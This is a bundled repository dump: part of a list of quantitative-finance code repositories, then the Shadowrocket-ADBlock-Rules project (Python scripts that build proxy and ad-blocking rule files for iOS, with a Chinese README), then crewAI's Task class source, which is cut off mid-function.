- Materials for the course of Computational Finance. - [Machine-Learning-for-Asset-Managers](https://github.com/emoen/Machine-Learning-for-Asset-Managers) - Implementation of code snippets, exercises and application to live data from Machine Learning for Asset Managers (Elements in Quantitative Finance) written by Prof. Marcos López de Prado. - [Python-for-Finance-Cookbook](https://github.com/PacktPublishing/Python-for-Finance-Cookbook) - Python for Finance Cookbook, published by Packt. - [modelos_vol_derivativos](https://github.com/ysaporito/modelos_vol_derivativos) - "Modelos de Volatilidade para Derivativos" book's Jupyter notebooks - [NMOF](https://github.com/enricoschumann/NMOF) - Functions, examples and data from the first and the second edition of "Numerical Methods and Optimization in Finance" by M. Gilli, D. Maringer and E. Schumann (2019, ISBN:978-0128150658). - [py4fi2nd](https://github.com/yhilpisch/py4fi2nd) - Jupyter Notebooks and code for Python for Finance (2nd ed., O'Reilly) by Yves Hilpisch. - [aiif](https://github.com/yhilpisch/aiif) - Jupyter Notebooks and code for the book Artificial Intelligence in Finance (O'Reilly) by Yves Hilpisch. - [py4at](https://github.com/yhilpisch/py4at) - Jupyter Notebooks and code for the book Python for Algorithmic Trading (O'Reilly) by Yves Hilpisch. - [dawp](https://github.com/yhilpisch/dawp) - Jupyter Notebooks and code for Derivatives Analytics with Python (Wiley Finance) by Yves Hilpisch. - [dx](https://github.com/yhilpisch/dx) - DX Analytics | Financial and Derivatives Analytics with Python. - [QuantFinanceBook](https://github.com/LechGrzelak/QuantFinanceBook) - Quantitative Finance book. - [rough_bergomi](https://github.com/ryanmccrickerd/rough_bergomi) - A Python implementation of the rough Bergomi model. - [frh-fx](https://github.com/ryanmccrickerd/frh-fx) - A python implementation of the fast-reversion Heston model of Mechkov for FX purposes. - [Value Investing Studies](https://github.com/euclidjda/value-investing-studies) - A collection of data analysis studies that examine the performance and characteristics of value investing over long periods of time. - [Machine Learning Asset Management](https://github.com/firmai/machine-learning-asset-management) - Machine Learning in Asset Management (by @firmai). - [Deep Learning Machine Learning Stock](https://github.com/LastAncientOne/Deep-Learning-Machine-Learning-Stock) - Deep Learning and Machine Learning stocks represent a promising long-term or short-term opportunity for investors and traders. - [Technical Analysis and Feature Engineering](https://github.com/jo-cho/Technical_Analysis_and_Feature_Engineering) - Feature Engineering and Feature Importance of Machine Learning in Financial Market. - [Differential Machine Learning and Axes that matter by Brian Huge and Antoine Savine](https://github.com/differential-machine-learning/notebooks) - Implement, demonstrate, reproduce and extend the results of the Risk articles 'Differential Machine Learning' (2020) and 'PCA with a Difference' (2021) by Huge and Savine, and cover implementation details left out from the papers. - [systematictradingexamples](https://github.com/robcarver17/systematictradingexamples) - Examples of code related to book [Systematic Trading](www.systematictrading.org) and [blog](http://qoppac.blogspot.com) - [pysystemtrade_examples](https://github.com/robcarver17/pysystemtrade_examples) - Examples using pysystemtrade for Robert Carver's [blog](http://qoppac.blogspot.com). - [ML_Finance_Codes](https://github.com/mfrdixon/ML_Finance_Codes) - Machine Learning in Finance: From Theory to Practice Book - [Hands-On Machine Learning for Algorithmic Trading](https://github.com/packtpublishing/hands-on-machine-learning-for-algorithmic-trading) - Hands-On Machine Learning for Algorithmic Trading, published by Packt - [financialnoob-misc](https://github.com/financialnoob/misc) - Codes from @financialnoob's posts - [MesoSim Options Trading Strategy Library](https://github.com/deltaray-io/strategy-library) - Free and public Options Trading strategy library for MesoSim. - [Quant-Finance-With-Python-Code](https://github.com/lingyixu/Quant-Finance-With-Python-Code) - Repo for code examples in Quantitative Finance with Python by Chris Kelliher - [QuantFinanceTraining](https://github.com/JoaoJungblut/QuantFinanceTraining) - This repository contains codes that were executed during my training in the CQF (Certificate in Quantitative Finance). The codes are organized by class, facilitating navigation and reference. - [Statistical-Learning-based-Portfolio-Optimization](https://github.com/YannickKae/Statistical-Learning-based-Portfolio-Optimization) - This R Shiny App utilizes the Hierarchical Equal Risk Contribution (HERC) approach, a modern portfolio optimization method developed by Raffinot (2018). - [book_irds3](https://github.com/attack68/book_irds3) - Code repository for Pricing and Trading Interest Rate Derivatives. - [Autoencoder-Asset-Pricing-Models](https://github.com/RichardS0268/Autoencoder-Asset-Pricing-Models) - Reimplementation of Autoencoder Asset Pricing Models ([GKX, 2019](https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3335536)). - [Finance](https://github.com/shashankvemuri/Finance) - 150+ quantitative finance Python programs to help you gather, manipulate, and analyze stock market data. - [101_formulaic_alphas](https://github.com/ram-ki/101_formulaic_alphas) - Implementation of [101 formulaic alphas](https://arxiv.org/ftp/arxiv/papers/1601/1601.00991.pdf) using qstrader.
Shadowrocket-ADBlock-Rules
1b691dc27ac483cfc0574c7559c6f9db9293c6f7
File: factory/build_confs.py # -*- coding: utf-8 -*- import re import time # confs names in template/ and ../ # except sr_head and sr_foot confs_names = [ 'sr_top500_banlist_ad', 'sr_top500_banlist', 'sr_top500_whitelist_ad', 'sr_top500_whitelist', 'sr_adb', 'sr_direct_banad', 'sr_proxy_banad', 'sr_cnip', 'sr_cnip_ad', 'sr_backcn', 'sr_backcn_ad' ] def getRulesStringFromFile(path, kind): file = open(path, 'r', encoding='utf-8') contents = file.readlines() ret = '' for content in contents: content = content.strip('\r\n') if not len(content): continue if content.startswith('#'): ret += content + '\n' else: prefix = 'DOMAIN-SUFFIX' if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', content): prefix = 'IP-CIDR' if '/' not in content: content += '/32' elif '.' not in content: prefix = 'DOMAIN-KEYWORD' ret += prefix + ',%s,%s\n' % (content, kind) return ret # get head and foot str_head = open('template/sr_head.txt', 'r', encoding='utf-8').read() str_foot = open('template/sr_foot.txt', 'r', encoding='utf-8').read() # make values values = {} values['build_time'] = time.strftime("%Y-%m-%d %H:%M:%S") values['top500_proxy'] = getRulesStringFromFile('resultant/top500_proxy.list', 'Proxy') values['top500_direct'] = getRulesStringFromFile('resultant/top500_direct.list', 'Direct') values['ad'] = getRulesStringFromFile('resultant/ad.list', 'Reject') values['manual_direct'] = getRulesStringFromFile('manual_direct.txt', 'Direct') values['manual_proxy'] = getRulesStringFromFile('manual_proxy.txt', 'Proxy') values['manual_reject'] = getRulesStringFromFile('manual_reject.txt', 'Reject') values['gfwlist'] = getRulesStringFromFile('resultant/gfw.list', 'Proxy') \ + getRulesStringFromFile('manual_gfwlist.txt', 'Proxy') # make confs for conf_name in confs_names: file_template = open('template/'+conf_name+'.txt', 'r', encoding='utf-8') template = file_template.read() template = str_head + template + str_foot file_output = open('../'+conf_name+'.conf', 'w', encoding='utf-8') marks = re.findall(r'{{(.+)}}', template) for mark in marks: template = template.replace('{{'+mark+'}}', values[mark]) file_output.write(template) File: factory/top500.py # -*- coding: utf-8 -*- from bs4 import BeautifulSoup import threading import time import sys import requests urls = ['http://alexa.chinaz.com/Global/index.html'] for i in range(2,21): urls.append('http://alexa.chinaz.com/Global/index_%d.html'%i) urls_scan_over = False domains = [] domains_proxy = [] domains_direct = [] # thread to scan pages in urls class UrlScaner(threading.Thread): def __init__(self): threading.Thread.__init__(self) def run(self): global urls_scan_over, urls done_num = 0 while len(urls): html = self.fetchHTML( urls.pop(0) ) self.praseHTML(html) done_num = done_num + 25 print('top500 List Got: %d/500'%done_num) time.sleep(1) urls_scan_over = True print('top500 List Fetched Over.') def fetchHTML(self, url): success = False try_times = 0 r = None while try_times < 5 and not success: r = requests.get(url) if r.status_code != 200: time.sleep(1) try_times = try_times + 1 else: success = True break if not success: sys.exit('error in request %s\n\treturn code: %d' % (url, r.status_code) ) r.encoding = 'utf-8' return r.text def praseHTML(self, html): soup = BeautifulSoup(html, "lxml") namesDom = soup.select("div.righttxt h3 span") for name in namesDom: domains.append(name.string) requests_header = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36', 'Cache-Control': 'max-age=0', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-HK;q=0.6,zh-TW;q=0.4,en;q=0.2', 'Connection': 'keep-alive' } # thread to visit websites class DomainScaner(threading.Thread): def __init__(self): threading.Thread.__init__(self) def run(self): while not urls_scan_over or len(domains): if len(domains) == 0: time.sleep(2) continue domain = domains.pop(0) if domain.endswith('.cn'): continue if 'google' in domain: continue is_proxy = False try: requests.get('http://www.' + domain, timeout=10, headers=requests_header) except BaseException: try: requests.get('http://' + domain, timeout=10, headers=requests_header) except BaseException: is_proxy = True if is_proxy: domains_proxy.append(domain) else: domains_direct.append(domain) print('[Doamins Remain: %d]\tProxy %s:%s' % (len(domains), is_proxy, domain) ) global scaner_thread_num scaner_thread_num -= 1 print('top500 Script Starting...\n\n') # Start Thread UrlScaner().start() scaner_thread_num = 0 for i in range(3): DomainScaner().start() scaner_thread_num += 1 # wait thread done while scaner_thread_num: pass # write files file_proxy = open('resultant/top500_proxy.list', 'w', encoding='utf-8') file_direct = open('resultant/top500_direct.list', 'w', encoding='utf-8') now_time = time.strftime("%Y-%m-%d %H:%M:%S") file_proxy.write('# top500 proxy list update time: ' + now_time + '\n') file_direct.write('# top500 direct list update time: ' + now_time + '\n') domains_direct = list( set(domains_direct) ) domains_proxy = list( set(domains_proxy) ) domains_direct.sort() domains_proxy.sort() for domain in domains_direct: file_direct.write(domain+'\n') for domain in domains_proxy: file_proxy.write(domain+'\n') File: factory/gfwlist.py # -*- coding: utf-8 -*- # # 下载并解析最新版本的 GFWList # 对于混合性质的网站,尽量走代理(忽略了所有的@@指令) # import time import requests import re import base64 rules_url = 'https://raw.githubusercontent.com/gfwlist/gfwlist/master/gfwlist.txt' unhandle_rules = [] def get_rule(rules_url): success = False try_times = 0 r = None while try_times < 5 and not success: r = requests.get(rules_url) if r.status_code != 200: time.sleep(1) try_times = try_times + 1 else: success = True break if not success: raise Exception('error in request %s\n\treturn code: %d' % (rules_url, r.status_code) ) rule = base64.b64decode(r.text) \ .decode("utf-8") \ .replace('\\n', '\n') return rule def clear_format(rule): rules = [] rule = rule.split('\n') for row in rule: row = row.strip() # 注释 直接跳过 if row == '' or row.startswith('!') or row.startswith('@@') or row.startswith('[AutoProxy'): continue # 清除前缀 row = re.sub(r'^\|?https?://', '', row) row = re.sub(r'^\|\|', '', row) row = row.lstrip('.*') # 清除后缀 row = row.rstrip('/^*') rules.append(row) return rules def filtrate_rules(rules): ret = [] for rule in rules: rule0 = rule # only hostname if '/' in rule: split_ret = rule.split('/') rule = split_ret[0] if not re.match('^[\w.-]+$', rule): unhandle_rules.append(rule0) continue ret.append(rule) ret = list( set(ret) ) ret.sort() return ret # main rule = get_rule(rules_url) rules = clear_format(rule) rules = filtrate_rules(rules) open('resultant/gfw.list', 'w', encoding='utf-8') \ .write('\n'.join(rules)) open('resultant/gfw_unhandle.log', 'w', encoding='utf-8') \ .write('\n'.join(unhandle_rules)) File: factory/chnroutes.py # -*- coding: utf-8 -*- # 爬取并生成 China Routes,目前此脚本未启用 import time import re import requests import sys apnic_ip_url = 'http://ftp.apnic.net/apnic/stats/apnic/delegated-apnic-latest' out_file = 'resultant/chnroutes.list' chnroutes = [] def fetchHTML(url): print("Downloading... " + url) success = False try_times = 0 r = None while try_times < 5 and not success: r = requests.get(url) if r.status_code != 200: time.sleep(1) try_times = try_times + 1 else: success = True break if not success: sys.exit('error in request %s\n\treturn code: %d' % (url, r.status_code) ) r.encoding = 'utf-8' return r.text.split('\n') # Main # apnic|CN|ipv4|116.89.240.0|1024|20170616|allocated searchRe = r'^apnic\|CN\|ipv4\|(.+)\|(\d+)\|\d+\|\w+$' for ln in fetchHTML(apnic_ip_url): reRet = re.match(searchRe, ln) if not reRet: continue print(reRet.group()) File: factory/ad.py # -*- coding: utf-8 -*- # # 提取广告规则,并且只提取对全域禁止的那种规则 # # 参考 ADB 广告规则格式:https://adblockplus.org/filters import time import sys import requests import re rules_url = [ # EasyList China #'https://easylist-downloads.adblockplus.org/easylistchina.txt', # EasyList + China 'https://easylist-downloads.adblockplus.org/easylistchina+easylist.txt', # 乘风 广告过滤规则 'https://raw.githubusercontent.com/xinggsf/Adblock-Plus-Rule/master/ABP-FX.txt' ] rule = '' # contain both domains and ips domains = [] for rule_url in rules_url: print('loading... ' + rule_url) # get rule text success = False try_times = 0 r = None while try_times < 5 and not success: r = requests.get(rule_url) if r.status_code != 200: time.sleep(1) try_times = try_times + 1 else: success = True break if not success: sys.exit('error in request %s\n\treturn code: %d' % (rule_url, r.status_code) ) rule = rule + r.text + '\n' # parse rule rule = rule.split('\n') for row in rule: row = row.strip() row0 = row # 处理广告例外规则 if row.startswith('@@'): i = 0 while i < len(domains): domain = domains[i] if domain in row: del domains[i] else: i = i + 1 continue # 处理广告黑名单规则 # 直接跳过 if row=='' or row.startswith('!') or "$" in row or "##" in row: continue # 清除前缀 row = re.sub(r'^\|?https?://', '', row) row = re.sub(r'^\|\|', '', row) row = row.lstrip('.*') # 清除后缀 row = row.rstrip('/^*') row = re.sub(r':\d{2,5}$', '', row) # 清除端口 # 不能含有的字符 if re.search(r'[/^:*]', row): print('ignore: '+row0) continue # 只匹配域名或 IP if re.match(r'^([a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,9}$', row) or re.match(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', row): domains.append(row) print('done.') # write into files file_ad = sys.stdout try: if sys.version_info.major == 3: file_ad = open('resultant/ad.list', 'w', encoding='utf-8') else: file_ad = open('resultant/ad.list', 'w') except: pass file_ad.write('# adblock rules refresh time: ' + time.strftime("%Y-%m-%d %H:%M:%S") + '\n') domains = list( set(domains) ) domains.sort() for item in domains: file_ad.write(item + '\n')
## 最完善的 iOS 翻墙规则 ### 停止更新公告 维护该项目已花费了我过多的时间,而生活中值得花费时间的东西太多,所以从即日起停止更新该项目。 ------------------------------------------------------ 这里是一系列好用的翻墙规则,针对 [Shadowrocket](https://liguangming.com/Shadowrocket) 开发,支持广告过滤。规则定义了哪些网站可以直连,哪些必须走代理,规则是一个纯文本文件,无法提供翻墙功能。使用 Python 按照一定的规则和模板定期自动生成,并且使用开源的力量,集众人之力逐渐完善。 **正在使用手机浏览本页面的用户 [请点击这里](https://github.com/h2y/Shadowrocket-ADBlock-Rules/blob/master/readme.md),查看完整的说明文档。** **本规则具有以下特点:** - 黑名单由最新版 GFWList 自动转换;白名单针对全球 top500 站点的连通情况定期自动生成。 - 自动转换最新版本的 `EasyList, Eaylist China, 乘风规则` 为 SR 规则,全面去除广告且去除重复。 - 也包括自定义的广告过滤规则,针对 iOS 端的网页广告、App 广告和视频广告。([常见广告过滤效果统计](https://github.com/h2y/Shadowrocket-ADBlock-Rules/issues/40)) - 提供多个规则文件让大家自由选择或者自由切换使用。 - 专门针对 ShadowRocket 开发,可以保证与 SR 的兼容性。 ## 规则列表 ![规则选择指南](https://h2y.github.io/Shadowrocket-ADBlock-Rules/figure/guide.png) 规则 | 规定代理的网站 | 规定直连的网站 --- | ----------- | ------------- [黑名单规则 + 去广告](#黑名单过滤--广告) | 被墙的网站(GFWList) | 正常的网站 [黑名单规则](#黑名单过滤) | | [白名单规则 + 去广告](#白名单过滤--广告) | 其他网站 | top500 网站中可直连的网站、中国网站 [白名单规则](#白名单过滤) | | [国内外划分 + 去广告](#国内外划分--广告) | 国外网站 | 中国网站 [国内外划分](#国内外划分) | | [全局直连 + 去广告](#直连去广告) | / | 全部 [全局代理 + 去广告](#代理去广告) | 全部 | / [回国规则 + 去广告](#回国规则--广告) | 中国网站 | 国外网站 [回国规则](#回国规则) | | - 以上所有规则,局域网内请求均直连。 - 可以下载多个规则切换使用。 ## 规则使用方法 在 ShadowRocket 应用中,进入 [配置] 页面,点击扫描二维码的按钮添加规则。再激活添加的规则文件即可。 最好让 ShadowRocket 断开并重新连接一次,以确保新的规则文件生效。 ## 请保护好自己 谷歌中英文的搜索体验都优于百度,而刷美剧、ins 追星、去推特看看特朗普也都挺有意思。但是,随着看到的人和事越多,我越发想要在这里说一些话,告诫路过的各位: **请务必保护好自己** 我们自认为打破了信息的壁垒,其实打破的是保护我们的屏障。因为外网真的存在很多误导性言论,来自各个利益集团对中国网民疯狂洗脑,他们往往还喜欢以平等自由等旗号自称,但仔细想想真的是这样吗?我只知道美国是最善于运用舆论的国家,会结合大数据潜移默化地改变你的观念。如果大家在上网过程中不经意看到了某些观点,务必保留自己独立思考的能力,如果你是一个容易被带偏的人,则建议回到屏障之中。 本规则只提供给大家用于更便捷地学习和工作。如果你是对上述观点持反对意见的极端政治人士,或者已被洗脑,请立即离开,本项目不对你开放。 ## 一些推荐的网站 [**糖客翻墙网**](https://cutt.ly/hhw1ZTi) :lollipop: 我最终选择的节点提供商。稳定、价格适中。节点遍布全球,提供 iPLC 路线。欢迎大家通过我的邀请链接前去使用。 iPLC 隧道不经过拥堵的公网出国、不经过防火墙,是目前最优秀的路线,速度谁用谁知道,建议选择。 **[IP111](http://ip111.cn/)** 这是一个很棒的 IP 查询网站,支持同时查询你的境内境外 IP,以及谷歌 IP。 **[wikiHow](https://zh.wikihow.com/)** 如何帮助心碎的朋友?如何给吊扇加油?你想知道的一切都可以在这里找到答案,最关键是采用漫画的方式挺有意思。 **[Google Photos](https://www.google.com/photos/about/)** 谷歌云相册提供无限空间保存手机中的日常照片,并且会对照片智能分类,体验很好。 **<https://hzy.pw/>** 我是一名大学生,沉迷技术无法自拔。这是我的个人博客,会分享一些有趣的东西和自己的观点,欢迎来逛逛~ ## 常见问题 - **上千行的代理规则,会对上网速度产生影响吗?** > 不会的。 > > 我之前也认为这是一个每次网络数据包经过都会执行一次的规则文件,逐行匹配规则,所以需要尽可能精简。但后来和 SR 作者交流后发现这是一个误区,SR 在每次加载规则时都会生成一棵搜索树,可以理解为对主机名从后往前的有限状态机 DFA,并不是逐行匹配,并且对每次的匹配结果还有个哈希缓存。 > > 换句话说,2000 行的规则和 50 行的规则在 SR 中均为同一量级的时间复杂度 O(1)。 - **你提供了这么多规则,如何选择适合我的?** > 最常用的规则是黑名单和白名单。区别在于对待 `未知网站` 的不同处理方式,黑名单默认直连,而白名单则默认使用代理。如果你选择恐惧症爆发,那就两个都下载好了,黑白名单切换使用,天下无忧。 - **你提供了这么多规则,却没有我想要的 o(>.<)o** > 有任何建议或疑问,[请联系我](#问题反馈)。 - **广告过滤不完全?** > 该规则并不保证 100% 过滤所有的广告,尤其是视频广告,与网页广告不同的是,优酷等 App 每次升级都有可能更换一次广告策略,因此难以保证其广告屏蔽的实时有效性。 ## 问题反馈 任何问题欢迎在 [Issues](https://github.com/h2y/Shadowrocket-ADBlock-Rules/issues) 中反馈,如果没有账号可以去 [我的网站](https://hzy.pw/p/2096#comments) 中留言。 你的反馈会让此规则变得更加完美。 **如何贡献代码?** 通常的情况下,对 [factory 目录](https://github.com/h2y/Shadowrocket-ADBlock-Rules/tree/master/factory) 下的 3 个 `manual_*.txt` 文件做对应修改即可。 ## 捐助 本项目不接受任何形式的捐助,因为自由地上网本来就是大家的权利,没有必要为此付出更多的代价。 但是,作为一个翻墙规则,不可避免的会对网站有所遗漏,需要大家来共同完善,当发现不好用的地方时,请打开 SR 的日志功能,检查一下是哪一个被墙的域名走了直连,或者是哪一个可以直连的域名走了代理。 将需要修改的信息反馈给我,大家的努力会让这个规则越来越完善! ---------------------------------------- ## 黑名单过滤 + 广告 黑名单中包含了境外网站中无法访问的那些,对不确定的网站则默认直连。 - 代理:被墙的网站(GFWList) - 直连:正常的网站 - 包含广告过滤 规则地址:<https://git.io/JfIXs> ![二维码](https://h2y.github.io/Shadowrocket-ADBlock-Rules/figure/sr_top500_banlist_ad.png?1) ## 白名单过滤 + 广告 白名单中包含了境外网站中可以访问的那些,对不确定的网站则默认代理。 - 直连:top500 网站中可直连的境外网站、中国网站 - 代理:默认代理其余的所有境外网站 - 包含广告过滤 规则地址:<https://git.io/JfIXo> ![二维码](https://h2y.github.io/Shadowrocket-ADBlock-Rules/figure/sr_top500_whitelist_ad.png?1) ## 黑名单过滤 现在很多浏览器都自带了广告过滤功能,而广告过滤的规则其实较为臃肿,如果你不需要全局地过滤 App 内置广告和视频广告,可以选择这个不带广告过滤的版本。 - 代理:被墙的网站(GFWList) - 直连:正常的网站 - 不包含广告过滤 规则地址:<https://git.io/JfIXS> ![二维码](https://h2y.github.io/Shadowrocket-ADBlock-Rules/figure/sr_top500_banlist.png?1) ## 白名单过滤 现在很多浏览器都自带了广告过滤功能,而广告过滤的规则其实较为臃肿,如果你不需要全局地过滤 App 内置广告和视频广告,可以选择这个不带广告过滤的版本。 - 直连:top500 网站中可直连的境外网站、中国网站 - 代理:默认代理其余的所有境外网站 - 不包含广告过滤 规则地址:<https://git.io/JfIXh> ![二维码](https://h2y.github.io/Shadowrocket-ADBlock-Rules/figure/sr_top500_whitelist.png?1) ## 国内外划分 + 广告 国内外划分,对中国网站直连,外国网站代理。包含广告过滤。国外网站总是走代理,对于某些港澳台网站,速度反而会比直连更快。 规则地址:<https://git.io/JfI1k> ![二维码](https://h2y.github.io/Shadowrocket-ADBlock-Rules/figure/sr_cnip_ad.png?1) ## 国内外划分 国内外划分,对中国网站直连,外国网站代理。不包含广告过滤。国外网站总是走代理,对于某些港澳台网站,速度反而会比直连更快。 规则地址:<https://git.io/JfI1q> ![二维码](https://h2y.github.io/Shadowrocket-ADBlock-Rules/figure/sr_cnip.png?1) ## 直连去广告 如果你想将 SR 作为 iOS 全局去广告工具,这个规则会对你有所帮助。 - 直连:所有请求 - 包含广告过滤 规则地址:<https://git.io/JfI1m> ![二维码](https://h2y.github.io/Shadowrocket-ADBlock-Rules/figure/sr_direct_banad.png?1) ## 代理去广告 如果你想将 SR 作为 iOS 全局去广告 + 全局翻墙工具,这个规则会对你有所帮助。 - 直连:局域网请求 - 代理:其余所有请求 - 包含广告过滤 规则地址:<https://git.io/JfI13> ![二维码](https://h2y.github.io/Shadowrocket-ADBlock-Rules/figure/sr_proxy_banad.png?1) ## 回国规则 提供给海外华侨使用,可以回到墙内,享受国内的一些互联网服务。 - 直连:国外网站 - 代理:中国网站 - 不包含广告过滤 规则地址:<https://git.io/JfI1s> ![二维码](https://h2y.github.io/Shadowrocket-ADBlock-Rules/figure/sr_backcn.png?1) ## 回国规则 + 广告 提供给海外华侨使用,可以回到墙内,享受国内的一些互联网服务。 - 直连:国外网站 - 代理:中国网站 - 包含广告过滤 规则地址:<https://git.io/JfI1Z> ![二维码](https://h2y.github.io/Shadowrocket-ADBlock-Rules/figure/sr_backcn_ad.png?1)
crewAI
322780a5f36840bf566aac97d872dc64261f4474
File: src/crewai/task.py import datetime import json import os import threading import uuid from concurrent.futures import Future from copy import copy from hashlib import md5 from typing import Any, Dict, List, Optional, Set, Tuple, Type, Union from opentelemetry.trace import Span from pydantic import ( UUID4, BaseModel, Field, PrivateAttr, field_validator, model_validator, ) from pydantic_core import PydanticCustomError from crewai.agents.agent_builder.base_agent import BaseAgent from crewai.tasks.output_format import OutputFormat from crewai.tasks.task_output import TaskOutput from crewai.telemetry.telemetry import Telemetry from crewai.utilities.config import process_config from crewai.utilities.converter import Converter, convert_to_model from crewai.utilities.i18n import I18N class Task(BaseModel): """Class that represents a task to be executed. Each task must have a description, an expected output and an agent responsible for execution. Attributes: agent: Agent responsible for task execution. Represents entity performing task. async_execution: Boolean flag indicating asynchronous task execution. callback: Function/object executed post task completion for additional actions. config: Dictionary containing task-specific configuration parameters. context: List of Task instances providing task context or input data. description: Descriptive text detailing task's purpose and execution. expected_output: Clear definition of expected task outcome. output_file: File path for storing task output. output_json: Pydantic model for structuring JSON output. output_pydantic: Pydantic model for task output. tools: List of tools/resources limited for task execution. """ __hash__ = object.__hash__ # type: ignore used_tools: int = 0 tools_errors: int = 0 delegations: int = 0 i18n: I18N = I18N() name: Optional[str] = Field(default=None) prompt_context: Optional[str] = None description: str = Field(description="Description of the actual task.") expected_output: str = Field( description="Clear definition of expected output for the task." ) config: Optional[Dict[str, Any]] = Field( description="Configuration for the agent", default=None, ) callback: Optional[Any] = Field( description="Callback to be executed after the task is completed.", default=None ) agent: Optional[BaseAgent] = Field( description="Agent responsible for execution the task.", default=None ) context: Optional[List["Task"]] = Field( description="Other tasks that will have their output used as context for this task.", default=None, ) async_execution: Optional[bool] = Field( description="Whether the task should be executed asynchronously or not.", default=False, ) output_json: Optional[Type[BaseModel]] = Field( description="A Pydantic model to be used to create a JSON output.", default=None, ) output_pydantic: Optional[Type[BaseModel]] = Field( description="A Pydantic model to be used to create a Pydantic output.", default=None, ) output_file: Optional[str] = Field( description="A file path to be used to create a file output.", default=None, ) output: Optional[TaskOutput] = Field( description="Task output, it's final result after being executed", default=None ) tools: Optional[List[Any]] = Field( default_factory=list, description="Tools the agent is limited to use for this task.", ) id: UUID4 = Field( default_factory=uuid.uuid4, frozen=True, description="Unique identifier for the object, not set by user.", ) human_input: Optional[bool] = Field( description="Whether the task should have a human review the final answer of the agent", default=False, ) converter_cls: Optional[Type[Converter]] = Field( description="A converter class used to export structured output", default=None, ) processed_by_agents: Set[str] = Field(default_factory=set) _telemetry: Telemetry = PrivateAttr(default_factory=Telemetry) _execution_span: Optional[Span] = PrivateAttr(default=None) _original_description: Optional[str] = PrivateAttr(default=None) _original_expected_output: Optional[str] = PrivateAttr(default=None) _thread: Optional[threading.Thread] = PrivateAttr(default=None) _execution_time: Optional[float] = PrivateAttr(default=None) @model_validator(mode="before") @classmethod def process_model_config(cls, values): return process_config(values, cls) @model_validator(mode="after") def validate_required_fields(self): required_fields = ["description", "expected_output"] for field in required_fields: if getattr(self, field) is None: raise ValueError( f"{field} must be provided either directly or through config" ) return self @field_validator("id", mode="before") @classmethod def _deny_user_set_id(cls, v: Optional[UUID4]) -> None: if v: raise PydanticCustomError( "may_not_set_field", "This field is not to be set by the user.", {} ) def _set_start_execution_time(self) -> float: return datetime.datetime.now().timestamp() def _set_end_execution_time(self, start_time: float) -> None: self._execution_time = datetime.datetime.now().timestamp() - start_time @field_validator("output_file") @classmethod def output_file_validation(cls, value: str) -> str: """Validate the output file path by removing the / from the beginning of the path.""" if value.startswith("/"): return value[1:] return value @model_validator(mode="after") def set_attributes_based_on_config(self) -> "Task": """Set attributes based on the agent configuration.""" if self.config: for key, value in self.config.items(): setattr(self, key, value) return self @model_validator(mode="after") def check_tools(self): """Check if the tools are set.""" if not self.tools and self.agent and self.agent.tools: self.tools.extend(self.agent.tools) return self @model_validator(mode="after") def check_output(self): """Check if an output type is set.""" output_types = [self.output_json, self.output_pydantic] if len([type for type in output_types if type]) > 1: raise PydanticCustomError( "output_type", "Only one output type can be set, either output_pydantic or output_json.", {}, ) return self def execute_sync( self, agent: Optional[BaseAgent] = None, context: Optional[str] = None, tools: Optional[List[Any]] = None, ) -> TaskOutput: """Execute the task synchronously.""" return self._execute_core(agent, context, tools) @property def key(self) -> str: description = self._original_description or self.description expected_output = self._original_expected_output or self.expected_output source = [description, expected_output] return md5("|".join(source).encode(), usedforsecurity=False).hexdigest() def execute_async( self, agent: BaseAgent | None = None, context: Optional[str] = None, tools: Optional[List[Any]] = None, ) -> Future[TaskOutput]: """Execute the task asynchronously.""" future: Future[TaskOutput] = Future() threading.Thread( target=self._execute_task_async, args=(agent, context, tools, future) ).start() return future def _execute_task_async( self, agent: Optional[BaseAgent], context: Optional[str], tools: Optional[List[Any]], future: Future[TaskOutput], ) -> None: """Execute the task asynchronously with context handling.""" result = self._execute_core(agent, context, tools) future.set_result(result) def _execute_core( self, agent: Optional[BaseAgent], context: Optional[str], tools: Optional[List[Any]], ) -> TaskOutput: """Run the core execution logic of the task.""" agent = agent or self.agent self.agent = agent if not agent: raise Exception( f"The task '{self.description}' has no agent assigned, therefore it can't be executed directly and should be executed in a Crew using a specific process that support that, like hierarchical." ) start_time = self._set_start_execution_time() self._execution_span = self._telemetry.task_started(crew=agent.crew, task=self) self.prompt_context = context tools = tools or self.tools or [] self.processed_by_agents.add(agent.role) result = agent.execute_task( task=self, context=context, tools=tools, ) pydantic_output, json_output = self._export_output(result) task_output = TaskOutput( name=self.name, description=self.description, expected_output=self.expected_output, raw=result, pydantic=pydantic_output, json_dict=json_output, agent=agent.role, output_format=self._get_output_format(), ) self.output = task_output self._set_end_execution_time(start_time) if self.callback: self.callback(self.output) if self._execution_span: self._telemetry.task_ended(self._execution_span, self, agent.crew) self._execution_span = None if self.output_file: content = ( json_output if json_output else pydantic_output.model_dump_json() if pydantic_output else result ) self._save_file(content) return task_output def prompt(self) -> str: """Prompt the task. Returns: Prompt of the task. """ tasks_slices = [self.description] output = self.i18n.slice("expected_output").format( expected_output=self.expected_output ) tasks_slices = [self.description, output] return "\n".join(tasks_slices) def interpolate_inputs(self, inputs: Dict[str, Any]) -> None: """Interpolate inputs into the task description and expected output.""" if self._original_description is None: self._original_description = self.description if self._original_expected_output is None: self._original_expected_output = self.expected_output if inputs: self.description = self._original_description.format(**inputs) self.expected_output = self._original_expected_output.format(**inputs) def increment_tools_errors(self) -> None: """Increment the tools errors counter.""" self.tools_errors += 1 def increment_delegations(self, agent_name: Optional[str]) -> None: """Increment the delegations counter.""" if agent_name: self.processed_by_agents.add(agent_name) self.delegations += 1 def copy(self, agents: List["BaseAgent"]) -> "Task": """Create a deep copy of the Task.""" exclude = { "id", "agent", "context", "tools", } copied_data = self.model_dump(exclude=exclude) copied_data = {k: v for k, v in copied_data.items() if v is not None} cloned_context = ( [task.copy(agents) for task in self.context] if self.context else None ) def get_agent_by_role(role: str) -> Union["BaseAgent", None]: return next((agent for agent in agents if agent.role == role), None) cloned_agent = get_agent_by_role(self.agent.role) if self.agent else None cloned_tools = copy(self.tools) if self.tools else [] copied_task = Task( **copied_data, context=cloned_context, agent=cloned_agent, tools=cloned_tools, ) return copied_task def _export_output( self, result: str ) -> 